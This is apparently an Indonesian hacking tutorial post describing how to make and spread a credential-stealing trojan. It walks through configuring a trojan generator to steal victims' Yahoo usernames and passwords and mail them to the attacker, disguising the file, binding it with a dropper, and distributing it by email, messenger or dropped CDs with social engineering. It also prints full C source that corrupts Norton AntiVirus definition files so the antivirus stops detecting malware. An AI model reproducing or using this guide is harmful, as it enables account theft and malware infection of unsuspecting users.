Bermain Dengan Virus Trojan

Mari kita bermain2 dengan trojan... tapi sebaiknya sebelum
Anda membaca tulisan ini ada baiknya membaca tulisan gue
sebelumnya tentang "Trojanku Sayang.. Trojanku Hilang"
karena pada tulisan tersebut Anda akan mendapatkan
pengetahuan tentang peralatan pendukung yang bisa digunakan dalam penyerangan mempergunakan trojan.
Anda pernah kehilangan Yahoo Account...?? sehingga email Anda tidak bisa dibuka lagi...??? Itu semua karena Anda ceroboh... Anda kena aksi dari sebuah trojan atau bisa jadi kena Social Engineering... ;) atau apalah.. karena memang banyak cara untuk mengambil alih account yahoo orang lain...
Kali gue mau main2 dengan trojan, nanti trojannya dikasih tugas untuk mendapatkan Yahoo account berupa username + passwordnya.
Trojan ini memang diciptakan dan selalu dikembangkan sesuai dengan perkembangan versi Yahoo Messenger.
Trojannya kita buat dengan trojan generator kemudian kita binding (ikat) dengan aplikasi pem-binding. Nanti hasil dari pembindingannya kita sebar di beberapa tempat, bisa melalui email, kirim langsung melalui YM atau dengan cara membuang (?) CD ditempat tertentu.

Bagaimana caranya?

Persiapan :
[-] Magic-PS Trojan Generator. Bisa Anda download google
[-] File Binder. Anda bisa memanfaatkan file binder apapun.
[-] C Compiler


Target Trojan :
[-] User yang mempergunakan windows (-- yg pake linux aman bro ;)
[-] User yang masih bisa kena 'social engineering' (bro.. terserah gimana caranya deh.. biar tuh user bisa mati'in Antivirusnya....)
Kalo dia ga mau mati'in ya udah nanti kita matikan secara paksa dengan coding tertentu... ingat jangan maen clurit ya? ;) ).


Pembuatan Trojan :
[-] Matikan semua Antivirus yang berada di komputer Anda (--hhikkzzz.. kalo ga dimatikan bakalan ga' bisa bikin trojan).
[-] Buatlah sebuah folder untuk menempatkan hasil trojan.
[-] Copy Magic-PS-15se++ ke dalam folder yang Anda buat, dan eksekusilah trojan generator tersebut.
Keterangan Trojan :

[01] Victim, pada bagian ini Anda bisa memberikan tugas tambahan pada trojan yang Anda inginkan, misalkan saja mengambil IP Address si target.

[02] File After Install, jika trojan ini dieksekusi maka trojan tersebut akan melakukan penyamaran diri berupa file 'regsvr.exe'. Anda bisa memilih file penyamaran lainnya.

[03] Y! ID, isi bagian ini dengan account Yahoo milik Anda. Ingat! Account ID milik Anda juga harus Yahoo! dan proses pengisian pada bagian tersebut tidak disertai "@yahoo.com". Jadi cukup mengisi ID saja. Trojan akan mencuri account + password si target kemudian secara otomatis trojan akan mengirim account tersebut ke email Anda (alamat email yang Anda set di trojan loh...)

[04] Choose icon, silahkan Anda memilih icon penyamaran trojan.

[05] FileName, ini merupakan file trojan hasil generator. File inilah yang nantinya Anda kirim ke target yang menjadi sasaran kita ;)
jangan sekali2 mengeksekusi file ini di komputer milik pribadi.... ;)

[06] Create MPS merupakan tombol yang men-generate trojan.





Penyiapan Routin Pembunuh NAV :

Bye bye NAV. Nah, ini adalah routine yang bisa Anda gunakan untuk membunuh NAV secara paksa. Routine ini dibuat oleh teman saya : Magic_h2001
(Hai 'Magic_h2001'... thx for ur code).

//--- code ----//
/*
Kill Norton AntiVirus (All versions). Local Exploit.
Norton AV can not protect this file : VIRSCAN1.DAT
and can not Detect any virus after modify this file !
(editor: jadi ceritanye nih, file .DAT nya dioverwrite ama data sampah)
*/

#include
int main()
{
HWND Lpbuff;
HKEY handle;
DWORD temp,size;
char buff[255],fName[255],dirName[255];
temp=RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\",0,KEY_READ,&handle);
if(temp!=ERROR_SUCCESS)
return 1;
size=sizeof(buff);
temp=RegQueryValueEx(handle,"CommonFilesDir",0,&temp,buff,&size);
if(temp!=ERROR_SUCCESS)
return 1;
RegCloseKey(handle);
strcat(buff,"\\Symantec Shared\\virusdefs\\");
strcpy(fName,buff);
strcat(buff,"definfo.dat");
SetFileAttributes(buff,FILE_ATTRIBUTE_ARCHIVE);
GetPrivateProfileString("DefDates","CurDefs","",dirName,sizeof(dirName),buff);
if(!strcmp(dirName,""))
return 1;
strcat(fName,dirName);
strcat(fName,"\\VIRSCAN1.DAT");
SetFileAttributes(fName,FILE_ATTRIBUTE_ARCHIVE);
handle=CreateFile(fName,GENERIC_WRITE,FILE_SHARE_READ,NULL,
OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL);
if(handle==INVALID_HANDLE_VALUE)
return 1;
size=GetFileSize(handle,&temp)-32;
Lpbuff=GlobalAlloc(GMEM_FIXED,size);

if(!Lpbuff)
{
CloseHandle(handle);
return 1;
}
FillMemory(Lpbuff,size,0x90);
SetFilePointer(handle,32,0,FILE_BEGIN);
WriteFile(handle,Lpbuff,size,&temp,NULL);
CloseHandle(handle);
return 0;
}


* Silahkan Anda Compile source code tersebut menjadi sebuah file eksekusi.

//--- code ----//


Proses Penyerangan :

Anggap saja dari beberapa proses tersebut diatas kita sudah mememiliki 2 (dua) file yaitu :
- sender.exe ----> trojan
- killanvir.exe ----> pembunuh NAV.

Kini saatnya Anda melakukan proses Binder terhadap keduanya. Yang terpenting pada proses Binder file yang bekerja pertama adalah killanvir.exe.
Hal ini dilakukan agar sebelum trojannya jalan, NAV sudah terbunuh lebih dulu. Setelah proses binding selesai kini saatnya Anda menyebarkan file tersebut ke target yang dituju. Terserah, dengan metode apapun (sekali lagi, jangan pakai clurit! ;) ).


Selamat menikmati trojan, dan ingat segala yang anda lakukan adalah tanggung jawab anda, anda.